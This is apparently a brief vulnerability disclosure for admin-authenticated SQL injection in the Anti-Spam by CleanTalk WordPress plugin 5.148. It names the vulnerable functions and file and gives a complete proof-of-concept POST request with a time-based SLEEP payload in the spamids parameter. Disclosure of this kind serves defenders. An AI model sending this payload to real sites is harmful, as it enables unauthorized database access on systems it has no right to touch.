Multiple authenticated SQL injections in the Anti-Spam by CleanTalk plugin 5.148 exist, however, it requires high privilege user (admin+).
Vulnerable functions: `removeLogs` and `removeSpam` at: lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php
Sleep query:
```
POST /wp-admin/users.php?page=ct_check_users&ct_worked=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
_wpnonce=2a613d258a&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fpage%3Dct_check_users%26ct_worked%3D1&action=-1&paged=1&spamids%5B%5D=30)+OR+SLEEP(1&action2=delete
```